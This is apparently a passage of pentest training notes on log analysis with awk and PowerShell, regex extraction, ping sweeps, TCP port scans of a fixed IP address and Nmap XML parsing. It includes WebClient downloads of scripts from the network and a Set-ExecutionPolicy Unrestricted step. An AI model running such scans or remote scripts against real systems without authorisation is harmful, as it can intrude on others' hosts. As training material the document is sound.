-----------------------------------------------------------------

Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl


Step 4. You need to be comfortable with privilege escalation
------------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html


------------------------------------------------------------------------------------------------------------------------



#######################
# Log Analysis basics #
#######################
Download this file and open it with Notepad
http://45.63.104.73/WhatHappened.txt


There are 4 steps to log analysis:

1. Reduce the noise
2. Group LIKE data
3. Rename fields to make it easier to read
4. Repeat



1835##############################################
1836# Log Analysis with Linux command-line tools #
1837##############################################
1838The following command line executables are found in the Mac as well as most Linux Distributions.
1839
1840cat – prints the content of a file in the terminal window
1841grep – searches and filters based on patterns
1842awk – can sort each row into fields and display only what is needed
1843sed – performs find and replace functions
1844sort – arranges output in an order
1845uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1846
1847
1848##############
1849# Cisco Logs #
1850##############
1851
1852-----------------------------Type this-----------------------------------------
1853wget http://45.63.104.73/cisco.log
1854-------------------------------------------------------------------------------
1855
1856AWK Basics
1857----------
1858To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1859
1860-----------------------------Type this-----------------------------------------
1861cd ~/log_analysis
1862cat cisco.log | awk '{print $5}' | tail -n 4
1863-------------------------------------------------------------------------------
1864
1865
1866
1867Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1868
1869-----------------------------Type this-----------------------------------------
1870cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
1871-------------------------------------------------------------------------------
1872
1873
1874
1875While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1876
1877-----------------------------Type this-----------------------------------------
1878cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
1879-------------------------------------------------------------------------------
1880
1881
1882
1883
1884Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1885
1886-----------------------------Type this-----------------------------------------
1887cat cisco.log | grep %LINEPROTO-5-UPDOWN:
1888
1889cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
1890
1891cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
1892
1893cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1894--------------------------------------------------------------------------------
1895
1896
1897
1898
1899
1900
1901
1902If you are interested in running PowerShell on Mac OS X, or Linux you can check out the following link:
1903https://www.howtogeek.com/267858/how-to-install-microsoft-powershell-on-linux-or-os-x/
1904
1905
1906
1907
1908
1909
1910#####################
1911# Powershell Basics #
1912#####################
1913
1914PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
1915
1916PowerShell file extension end in .ps1 .
1917
1918An important note is that you cannot double click on a PowerShell script to execute it.
1919
1920To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell. Make sure that you run it as an administrator
1921
1922------------------------Type This------------------------------
1923cd c:\
1924dir
1925cd
1926ls
1927---------------------------------------------------------------
1928
1929
1930To obtain a list of cmdlets, use the Get-Command cmdlet
1931------------------------Type This------------------------------
1932Get-Command
1933---------------------------------------------------------------
1934
1935
1936You can use the Get-Alias cmdlet to see a full list of aliased commands.
1937------------------------Type This------------------------------
1938Get-Alias
1939---------------------------------------------------------------
1940
1941
1942Don't worry you won't blow up your machine with Powershell
1943------------------------Type This------------------------------
1944Get-Process | stop-process Don't press [ ENTER ] What will this command do?
1945Get-Process | stop-process -whatif
1946---------------------------------------------------------------
1947
1948To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
1949------------------------Type This------------------------------
1950Get-Help Get-Command
1951
1952Get-Help Get-Service –online
1953
1954Get-Service -Name TermService, Spooler
1955
1956Get-Service –N BITS
1957---------------------------------------------------------------
1958
1959
1960
1961
1962
1963- Run cmdlet through a pie and refer to its properties as $_
1964------------------------Type This------------------------------
1965Get-Service | where-object { $_.Status -eq "Running"}
1966---------------------------------------------------------------
1967
1968
1969
1970- PowerShell variables begin with the $ symbol. First lets create a variable
1971------------------------Type This------------------------------
1972$serv = Get-Service –N Spooler
1973---------------------------------------------------------------
1974
1975To see the value of a variable you can just call it in the terminal.
1976------------------------Type This------------------------------
1977$serv
1978
1979$serv.gettype().fullname
1980---------------------------------------------------------------
1981
1982
1983Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
1984------------------------Type This------------------------------
1985$serv | Get-Member
1986
1987Get-Member -InputObject $serv
1988---------------------------------------------------------------
1989
1990
1991
1992
1993Let's use a method and a property with our object.
1994------------------------Type This------------------------------
1995$serv.Status
1996$serv.Stop()
1997$serv.Refresh()
1998$serv.Status
1999$serv.Start()
2000$serv.Refresh()
2001$serv.Status
2002---------------------------------------------------------------
2003
2004
2005If you want some good command-line shortcuts you can check out the following link:
2006https://technet.microsoft.com/en-us/library/ff678293.aspx
2007
2008
2009
2010
#############################
# Simple Event Log Analysis #
#############################
Let's set up a directory to work in:
------------------------Type This------------------------------
cd c:\

mkdir ps

cd ps
---------------------------------------------------------------

Step 1: Dump the event logs
---------------------------
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.

To dump the event log, you can use the Get-EventLog and Export-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
If you need to work with one of the newer "Applications and Services" or trace logs, use Get-WinEvent instead of Get-EventLog. Get-EventLog only exists in Windows PowerShell (5.1 and earlier); in PowerShell 7 use Get-WinEvent for everything.
------------------------Type This------------------------------
Get-EventLog -LogName application | Export-Clixml Applog.xml

type .\Applog.xml

$logs = "system","application","security"
---------------------------------------------------------------


The % symbol is an alias for the ForEach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console. Here it runs the export once per log name in $logs (the security log needs an elevated prompt).
------------------------Type This------------------------------
$logs | % { Get-EventLog -LogName $_ | Export-Clixml "$_.xml" }
---------------------------------------------------------------



Step 2: Import the event log of interest
----------------------------------------
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
Store the results in a variable.
Let's take a look at the cmdlets Where-Object, Group-Object, and Select-Object.

The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained (Get-EventLog returns newest first, so -Last gives the oldest).
------------------------Type This------------------------------
$seclog = Import-Clixml security.xml

$seclog | select -Last 5
---------------------------------------------------------------

Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
------------------------Type This------------------------------
Get-EventLog Application -After (Get-Date).AddDays(-1)
---------------------------------------------------------------
You can use -After and -Before to filter date ranges.

One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NTFS and share permissions on the location where you store it.
By default, an ordinary user does not have permission to read the security log, so put the export somewhere with equivalent restrictions.


I had another student ask me if we can go back in hours instead of days, and the answer is yes.
------------------------Type This------------------------------
Get-EventLog Application -After (Get-Date).AddHours(-1)
---------------------------------------------------------------


Step 3: Drill into a specific entry
-----------------------------------
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.

------------------------Type This------------------------------
$seclog | select -first 1 | fl *
---------------------------------------------------------------

For a logon event (for example event ID 4624) the Message property contains the SID, account name, user domain, and privileges assigned to the new logon session. Other event IDs carry different text, so the first entry in your log may look quite different.

------------------------Type This------------------------------
($seclog | select -first 1).message

(($seclog | select -first 1).message).gettype()
---------------------------------------------------------------


In the *nix world you often want a count of something (wc -l).
How often is the SeSecurityPrivilege privilege mentioned in the Message property?
To obtain this information, pipe the contents of the security log to Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
------------------------Type This------------------------------
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
---------------------------------------------------------------
To see which event IDs the matching entries belong to, use Group-Object to group the matches by the EventID property:

------------------------Type This------------------------------
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
---------------------------------------------------------------

Because importing the event log from the stored XML results in an array of event log entries, the Count property is also present.
Use the Count property to determine the total number of entries in the event log.
------------------------Type This------------------------------
$seclog.Count
---------------------------------------------------------------



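The steps above work on an XML export and match on the Message text. The following is an added example (not part of the course notes) that does the same triage against the live Security log: Get-WinEvent with a server-side filter for logon events, the per-event XML parsed into named fields instead of regex-matching the Message, and the failures grouped the way a defender would look for password spraying or brute force. It assumes an elevated Windows PowerShell 5.1 or PowerShell 7 session; the event IDs, field names and status codes are the documented Windows ones, everything else (the 24-hour window, the top-10 cut) is a choice made for this example.

```powershell
# Added example: logon-event triage from the live Security log.
# Assumes an elevated session (reading Security needs admin or "Event Log Readers").
param(
    [int]$Hours = 24
)

# 4624 = successful logon, 4625 = failed logon. FilterHashtable is evaluated by
# the event log service, so it is much faster than Get-EventLog | Where-Object.
$filter = @{
    LogName   = 'Security'
    Id        = 4624, 4625
    StartTime = (Get-Date).AddHours(-$Hours)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

# Turn the <Data Name="..."> elements of one event into a flat object.
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    [xml]$xml = $Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) {
        $data[$d.Name] = $d.'#text'
    }
    [pscustomobject]@{
        Time      = $Event.TimeCreated
        Id        = $Event.Id
        User      = $data['TargetUserName']
        Domain    = $data['TargetDomainName']
        LogonType = $data['LogonType']   # 2 interactive, 3 network, 10 RDP
        SourceIp  = $data['IpAddress']
        Status    = $data['Status']      # 4625 only: 0xC000006A bad password, 0xC0000064 no such user
    }
}

$logons = $events | ForEach-Object { ConvertFrom-EventData $_ }

# Failed logons grouped by account and source. Password spraying shows up as
# many different users from one IP; brute force as one user with many failures.
$logons | Where-Object Id -eq 4625 |
    Group-Object User, SourceIp |
    Sort-Object Count -Descending |
    Select-Object Count, Name -First 10

# Successful network (3) and RDP (10) logons per account, machine accounts
# (names ending in $) excluded.
$logons | Where-Object { $_.Id -eq 4624 -and $_.LogonType -in '3', '10' -and $_.User -notlike '*$' } |
    Group-Object User |
    Sort-Object Count -Descending |
    Select-Object Count, Name -First 10
```

Save it as a .ps1 and run it as .\Logon-Triage.ps1 -Hours 48 to widen the window. ToXml() is used because the Message text is localised and its layout changes between Windows versions, while the EventData field names do not.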
2114
2115############################
2116# Simple Log File Analysis #
2117############################
2118
2119
2120You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
2121
2122------------------------Type This------------------------------
2123cd c:\ps
2124(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
2125(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
2126Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
2127---------------------------------------------------------------
2128
2129
2130
2131The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
2132------------------------Type This------------------------------
2133Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
2134---------------------------------------------------------------
2135
2136
2137
2138To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
2139------------------------Type This------------------------------
2140Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
2141---------------------------------------------------------------
2142
2143
2144To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
2145------------------------Type This------------------------------
2146Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
2147---------------------------------------------------------------
2148
2149
2150Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
2151------------------------Type This------------------------------
2152Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
2153---------------------------------------------------------------
2154
2155In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
2156This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
2157------------------------Type This------------------------------
2158Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
2159---------------------------------------------------------------
2160
2161
2162
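The awk/sort/uniq pipeline in the Cisco Logs section and the Select-String commands just above both work on raw text and depend on field positions. The following is an added example (not part of the course notes) that applies the four log-analysis steps (reduce the noise, group like data, rename fields, repeat) to Cisco syslog lines as PowerShell objects. The sample lines are constructed for this example; in a real cisco.log the timestamp and sequence-number prefix varies, which is exactly why the regex anchors on the %FACILITY-SEVERITY-MNEMONIC tag rather than on $5 or $10.

```powershell
# Added example: Cisco syslog triage with objects instead of positional fields.
# The log lines below are constructed for this example.
$raw = @'
Mar 16 14:01:02 rtr1 105: *Mar 16 14:01:02.117: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
Mar 16 14:01:05 rtr1 106: *Mar 16 14:01:05.201: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
Mar 16 14:02:11 rtr1 107: *Mar 16 14:02:11.009: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.5)
Mar 16 14:03:40 rtr1 108: *Mar 16 14:03:40.550: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: root] [Source: 203.0.113.9] [localport: 22] [Reason: Login Authentication Failed]
Mar 16 14:03:44 rtr1 109: *Mar 16 14:03:44.001: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 203.0.113.9] [localport: 22] [Reason: Login Authentication Failed]
Mar 16 14:04:00 rtr1 110: *Mar 16 14:04:00.300: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to down
this line is garbage that never matches
'@
$sample = $raw -split "`r?`n"

# Step 1 (reduce the noise): keep only lines that carry a %FACILITY-SEVERITY-MNEMONIC tag.
# Step 3 (rename fields): named capture groups turn positions into readable names.
$tagRegex = '%(?<Facility>[A-Z_]+)-(?<Severity>[0-7])-(?<Mnemonic>[A-Z_]+):\s*(?<Text>.*)$'

function ConvertFrom-CiscoSyslog {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match $tagRegex) {
            [pscustomobject]@{
                Facility = $Matches.Facility
                Severity = [int]$Matches.Severity   # 0 emergency ... 7 debug
                Mnemonic = $Matches.Mnemonic
                Text     = $Matches.Text
                Raw      = $line
            }
        }
    }
}

$entries = ConvertFrom-CiscoSyslog -Lines $sample

# Step 2 (group like data): the PowerShell equivalent of "sort | uniq -c | sort -rn".
$entries | Group-Object Facility, Severity, Mnemonic |
    Sort-Object Count -Descending |
    Select-Object Count, Name

# Step 4 (repeat) on the noisiest group: interface and new state, the same
# pairing the awk '{print $10 " changed to " $14}' command produced.
$entries | Where-Object Mnemonic -eq 'UPDOWN' |
    ForEach-Object {
        if ($_.Text -match 'Interface (?<Iface>\S+), changed state to (?<State>\w+)') {
            [pscustomobject]@{ Interface = $Matches.Iface; State = $Matches.State }
        }
    } |
    Group-Object Interface, State |
    Select-Object Count, Name

# Severity 4 and below is warning or worse. Failed logins per source address
# are what a defender actually wants out of this file.
$entries | Where-Object { $_.Severity -le 4 -and $_.Mnemonic -eq 'LOGIN_FAILED' } |
    ForEach-Object { if ($_.Text -match '\[Source: (?<Src>[\d.]+)\]') { $Matches.Src } } |
    Group-Object | Select-Object Count, Name
```

To run it against the downloaded file, replace the $sample assignment with Get-Content .\CiscoLogFileExamples.txt; the rest is unchanged because nothing depends on where the tag sits in the line.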
##############################################
# Parsing Log files using windows PowerShell #
##############################################

Download the sample IIS log http://pastebin.com/LBn64cyA (already done if you followed the previous section).

------------------------Type This------------------------------
(New-Object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")

Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") }
---------------------------------------------------------------


The above command gives us all the WebDAV requests.

To narrow this further, combine conditions with -and. Here we keep only the WebDAV OPTIONS requests; the same pattern works for a user name or a client IP address:
------------------------Type This------------------------------
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS") }
---------------------------------------------------------------


Some more filters that are commonly needed on an Exchange/IIS server:

For Outlook Web Access: replace WebDAV with OWA

For EAS: replace WebDAV with Microsoft-Server-ActiveSync

For ECP: replace WebDAV with ECP




2197
2198####################################################################
2199# Windows PowerShell: Extracting Strings Using Regular Expressions #
2200####################################################################
2201
2202
2203Regex Characters you might run into:
2204
2205^ Start of string, or start of line in a multiline pattern
2206$ End of string, or start of line in a multiline pattern
2207\b Word boundary
2208\d Digit
2209\ Escape the following character
2210* 0 or more {3} Exactly 3
2211+ 1 or more {3,} 3 or more
2212? 0 or 1 {3,5} 3, 4 or 5
2213
2214
2215
2216To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
2217
22181) The input file that will be parsed
2219------------------------Type This------------------------------
2220(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
2221(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
2222(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
2223---------------------------------------------------------------
22242) The regular expression that the input file will be compared against
2225
22263) The output file for where the extracted data will be placed.
2227
2228Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
2229Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
2230
2231To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
2232------------------------Type This------------------------------
2233$input_path = 'c:\ps\emails.txt'
2234$output_file = 'c:\ps\extracted_addresses.txt'
2235$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
2236select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2237---------------------------------------------------------------
2238
2239
2240In this script, we have the following variables:
2241
22421) $input_path to hold the path to the input file we want to parse
2243
22442) $output_file to hold the path to the file we want the results to be stored in
2245
22463) $regex to hold the regular expression pattern to be used when the strings are being matched.
2247
2248The select-string cmdlet contains various parameters as follows:
2249
22501) "-Path" which takes as input the full path to the input file
2251
22522) "-Pattern" which takes as input the regular expression used in the matching process
2253
22543) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
2255
2256Using ">" the results are written to the destination specified in the $output_file variable.
2257
2258Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
2259
2260IP addresses
2261------------
2262For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
2263------------------------Type This------------------------------
2264$input_path = 'c:\ps\ip_addresses.txt'
2265$output_file = 'c:\ps\extracted_ip_addresses.txt'
2266$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
2267select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2268---------------------------------------------------------------
2269
2270
2271
2272URLs
2273----
2274For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
2275You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
2276------------------------Type This------------------------------
2277$input_path = 'c:\ps\URL_addresses.txt'
2278$output_file = 'c:\ps\extracted_URL_addresses.txt'
2279$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
2280select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2281---------------------------------------------------------------
2282
2283In addition to the examples above, many other types of strings can be extracted using this script.
2284All you need to do is switch the regular expression in the "$regex" variable!
2285In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
2286
2287
2288
2289
2290
2291
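The three scripts above share the same Select-String pipeline. The following is an added example (not part of the course notes) that turns it into a function and fixes the two practical gaps: matches are de-duplicated and can be post-validated (so 300.400.500.600 is rejected even though \d{1,3} matches it), and the output file is written as ASCII instead of the UTF-16 that ">" produces in Windows PowerShell 5.1. The sample input, the file names under $env:TEMP and the {2,} in the e-mail pattern (instead of the {2,4} used above) are choices made for this example.

```powershell
# Added example: reusable regex extraction with de-duplication, optional
# validation of each match, and an explicit output encoding.
function Export-RegexMatches {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Pattern,
        [string]$OutFile,
        [scriptblock]$Validate = { $true }   # optional per-match filter
    )
    $values = Select-String -Path $Path -Pattern $Pattern -AllMatches |
        ForEach-Object { $_.Matches } |
        ForEach-Object { $_.Value } |
        Where-Object { & $Validate $_ } |
        Sort-Object -Unique
    if ($OutFile) { $values | Set-Content -Path $OutFile -Encoding ascii }
    $values
}

# Every octet must be 0-255; the course regex alone accepts 300.400.500.600.
function Test-IPv4 {
    param([string]$Text)
    $octets = $Text -split '\.'
    if ($octets.Count -ne 4) { return $false }
    foreach ($o in $octets) { if ([int]$o -gt 255) { return $false } }
    $true
}

# Constructed sample input so the script runs without the pastebin files.
$sampleFile = Join-Path $env:TEMP 'ip_sample.txt'
@'
  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    12 ms    11 ms    12 ms  10.0.0.1
  3    14 ms    13 ms    14 ms  203.0.113.7
bogus 300.400.500.600 should be rejected, 10.0.0.1 seen again
mail from alice@example.org and bob.smith@sub.example.co.uk
'@ | Set-Content -Path $sampleFile -Encoding ascii

$ipRegex    = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
$emailRegex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'

# Unique, validated IPv4 addresses, also written to a file.
Export-RegexMatches -Path $sampleFile -Pattern $ipRegex -Validate { param($v) Test-IPv4 $v } `
    -OutFile (Join-Path $env:TEMP 'extracted_ip_addresses.txt')

# Unique e-mail addresses, returned to the pipeline only.
Export-RegexMatches -Path $sampleFile -Pattern $emailRegex
```

The -Validate script block receives each match as its argument; any check that returns $true or $false works there, so a domain allow-list or a private-range filter drops in the same way.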
########################################
# Basic Network Commands in PowerShell #
########################################

Reference:
https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/


2299
2300###################
2301# Pentester Tasks #
2302###################
2303Reference:
2304http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
2305
2306
2307Listing IPs
2308-----------
2309One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
2310
2311------------------------Type This------------------------------
2312$octect = "149.28.201."
2313$lastoctect = (1..255)
2314$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
2315---------------------------------------------------------------
2316
2317
2318Ping Sweep
2319------------------------------------------------------
2320PowerShell provides several methods for doing Ping
2321Test-Connection cmdlet
2322Creation of a WMI Object
2323.Net System.Net.NetworkInformation.Ping Object
2324------------------------------------------------------
2325
2326
2327
2328Port Scans
2329----------
2330To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
2331For TCP the .Net System.Net.Sockets.TcpClient
2332For UDP the .Net System.Net.Sockets.UdpClient
2333
2334
2335
2336
2337TCP Scan (Windows 7)
2338--------------------
2339NOTE: If you are using Windows 7, use the code below
2340------------------------Type This------------------------------
2341$ports=22,80,443,3389
2342$target = "149.28.201.171"
2343foreach ($i in $ports) {
2344try {
2345$socket = new-object System.Net.Sockets.TCPClient($target, $i);
2346} catch {}
2347if ($socket -eq $NULL) {
2348echo "$target:$i - Closed";
2349} else {
2350echo "$target:$i - Open";
2351$socket = $NULL;
2352}}
2353---------------------------------------------------------------
2354
2355
2356
2357TCP Scan (Windows 10)
2358---------------------
2359NOTE: If you are using Windows 10, use the code below
2360
2361------------------------Type This------------------------------
2362$ports=22,80,443,3389
2363$target = "149.28.201.171"
2364foreach ($i in $ports) {
2365try {
2366$socket = new-object System.Net.Sockets.TCPClient($target, $i);
2367} catch {}
2368if ($socket -eq $NULL) {
2369echo "${target}:$i - Closed";
2370} else {
2371echo "${target}:$i - Open";
2372$socket = $NULL;
2373}}
2374---------------------------------------------------------------
2375
2376
2377
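The scans above cannot tell a closed port (RST received) from a filtered one (nothing received), and they block for as long as the OS keeps retrying. The following is an added example (not part of the course notes) that starts each connect asynchronously, waits a bounded time, and reports open / closed / filtered, with an optional Test-Connection sweep in front of it. The target range, port list and timeouts are assumptions for this example; scan only hosts you are authorised to test.

```powershell
# Added example: TCP connect scan with a timeout, plus a ping sweep.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutMs = 1000
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($Target, $Port, $null, $null)
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) {
            $state = 'Filtered'          # neither SYN/ACK nor RST within the timeout
        } else {
            try {
                $client.EndConnect($async)   # completes the handshake or throws
                $state = 'Open'
            } catch {
                $state = 'Closed'            # RST received (connection refused)
            }
        }
    } finally {
        $client.Close()
    }
    [pscustomobject]@{ Target = $Target; Port = $Port; State = $state }
}

# Host discovery first. ICMP is often blocked, so a failed ping is recorded,
# not used to skip the host.
$octet   = '149.28.201.'
$targets = 1..254 | ForEach-Object { "$octet$_" } | Select-Object -First 3   # trimmed for the example
$ports   = 22, 80, 443, 3389

foreach ($t in $targets) {
    $alive = Test-Connection -ComputerName $t -Count 1 -Quiet -ErrorAction SilentlyContinue
    foreach ($p in $ports) {
        Test-TcpPort -Target $t -Port $p -TimeoutMs 500 |
            Select-Object *, @{ n = 'PingReply'; e = { $alive } }
    }
}
```

Filtered results are the interesting ones on a pentest: they usually mean a firewall is dropping the probe rather than the host rejecting it. Remove the Select-Object -First 3 to sweep the whole /24.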
##########################
# Parsing Nmap XML Files #
##########################
If you are NOT using the Win7 VM provided then you can get the required files for this lab, which are located in this zip file:
https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip


Let's set up a directory to work in:
------------------------Type This------------------------------
cd c:\

mkdir ps

cd ps
---------------------------------------------------------------



------------------------Type This------------------------------
cd c:\ps
mkdir PowerShell-Files
cd PowerShell-Files
(New-Object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")
(New-Object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")
(New-Object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")
---------------------------------------------------------------


Run PowerShell as administrator
------------------------Type This------------------------------
cd C:\ps\PowerShell-Files

Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted -Force
---------------------------------------------------------------
Unrestricted is fine in a throwaway lab VM. On a real workstation prefer RemoteSigned, or limit the change to the current session with Set-ExecutionPolicy Bypass -Scope Process. Execution policy is not a security boundary either way; it only stops accidental execution.


Parse nmap XML
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml
---------------------------------------------------------------


Process all XML files
------------------------Type This------------------------------
.\parse-nmap.ps1 *.xml
---------------------------------------------------------------

Piping also works
------------------------Type This------------------------------
dir *.xml | .\parse-nmap.ps1
---------------------------------------------------------------

Advanced parsing with filtering conditions
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
---------------------------------------------------------------


More parsing
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
---------------------------------------------------------------

Parsing with -match and multiple conditions (the | inside the pattern is regex alternation)
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -match "open:tcp:80|open:tcp:443"}
---------------------------------------------------------------


CSV Export
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
---------------------------------------------------------------

Import Data from CSV
